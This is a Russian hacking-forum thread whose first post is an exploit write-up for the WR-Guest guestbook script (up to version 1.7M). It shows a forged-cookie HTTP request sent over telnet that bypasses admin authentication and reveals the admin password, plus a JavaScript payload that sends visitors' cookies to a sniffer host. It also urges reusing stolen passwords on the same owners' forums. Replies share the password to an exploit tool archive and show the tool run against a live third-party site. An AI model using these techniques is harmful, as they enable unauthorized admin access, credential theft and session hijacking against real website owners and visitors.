![]() |
Описание уязвимости гостевой WR-Guest<=1.7M
#WR-Guest <=1.7M
------------------------ В первую очередь описание данной уязвимости будет полезно для начинающих, оно не будет интересно продвинутым челам и не является предлогом к действиям запрещенными законами РФ. Скрипт был написан 07.01. В каком состоянии был автор я незнаю, но точно не в трезвом.)) #Основы ------------ Итак, Cookie — это именованная порция (довольно небольшая) информации, которая может сохраняться прямо в настройках браузера пользователя между сеансами. Причина, по которой применяются Cookies — большое количество посетителей вашего сервера, а также нежелание иметь нечто подобное базе данных для хранения информации о каждом посетителе. Поиск в такой базе может очень и очень затянуться (например, при цифре миллион гостей в день он будет отнимать львиную долю времени), и, в то же время, нет никакого смысла централизованно хранить столь отрывочные сведения. Использование Cookies фактически перекладывает задачу на плечи браузера, решая одним махом как проблему быстродействия, так и проблему большого объема базы данных с информацией о пользователе. Самый распространенный пример применения Cookies — логин и пароль пользователя, использующего некоторые защищенные ресурсы вашего сайта. Эти данные, конечно же, между открытиями страниц хранятся в Cookies, для того чтобы пользователю не пришлось их каждый раз набирать вручную заново. Котеров Д. В. Самоучитель PHP 4 #Поехали ------------- Сама уязвимость данной гостевой книги и заключается в неправильной проверке куки, а точнее в отсутствии ее вообще. Вот участок бажного кода файла admin.php: Код:
if (!isset($_COOKIE['gbcookies'])) { // проверка на куки#Exploit ------------- Первым делом на ум приходит прителнетиться к хосту и запросить страницу, не забыв отправить куки. telnet wr-script.ru 80 ... ждем коннект... GET /guest/admin.php HTTP/1.1 Host: wr-script.ru Cookie: gbcookies=1|admin|12345678| Enter Enter Получаем страницу админки, где можно увидеть пароль админа(admin.php?pswrd=admin). Спрашивается зачем передавать пароль через GET переменную, если есть куки, да еще в открытом виде?! В итоге мы имеем 300 уязвимых гостевых (по запросу в рамблере), если учесть, что некоторые админы ставят одинаковые пароли на разные скрипты, то еще и форумы получим. Или есть пароль на гостевуху adminguest, то методом дедукции разгадаем пароль к форуму(adminforum). Для более наглых можно впихнуть в текст приветствия гостевухи javascript, который будет отправлять куки на ваш снифер: Код:
<script>var d=new Image;d.src='http://site/s.php?a='+document.cookie;</script>Код:
<?php http://anuta-rebenok.by.ru/pic/10.jpg http://anuta-rebenok.by.ru/pic/11.jpg #Ссылки ------------ wr-script.ru - разработчик WR-Guest, можно поглумиться на форуме ckyhc.t35.com/wr-guest.rar - на архив стоит пароль, кому нужен пароль стучите к REDSaratov'у в аську 353676415 или пишите мне на gasoid[+]gmail.com Статью подготовили и испытали уязвимость Stefun и REDSaratov. |
Выложите пасс плиз =))
|
дубликат сабжа?
|
zl0y,
пасс хэкнут :) - piskarik123$% |
Бляяяя, пиздец полный...
У нас в квесте эта геста была ее поломать надо было, все каюк блять терь новый двиг искать и баги в нем.... ЗыЗы кстате где то выкладывал я эту батву.... |
а пасс брутом брать что ли...
|
пишите на почту gasoid[+]gmail.com, кому пасс нужен.
|
а можно узнать чем он там кодируется? я имею ввиду пас в этом движке
|
Ничем, голый текст
|
вот запускаю прогу она мне показывает следующее
запуск с ошибочными параметрами C:\>wr-guest.exe www.korolkov.net/g1b/index.php *** Target: WR-Guest <=1.7M *** * Site [www.korolkov.net] * Path [/g1b/] * Connect [OK] * Send cookies [OK] запуск с правильными параметрами C:\>wr-guest.exe www.korolkov.net/gb/index.php *** Target: WR-Guest <=1.7M *** * Site [www.korolkov.net] * Path [/gb/] * Connect [OK] * Send cookies [OK] почему нет ни какого различия ? ведь директория неправильная а все равно показывает ОК |
| Время: 23:28 |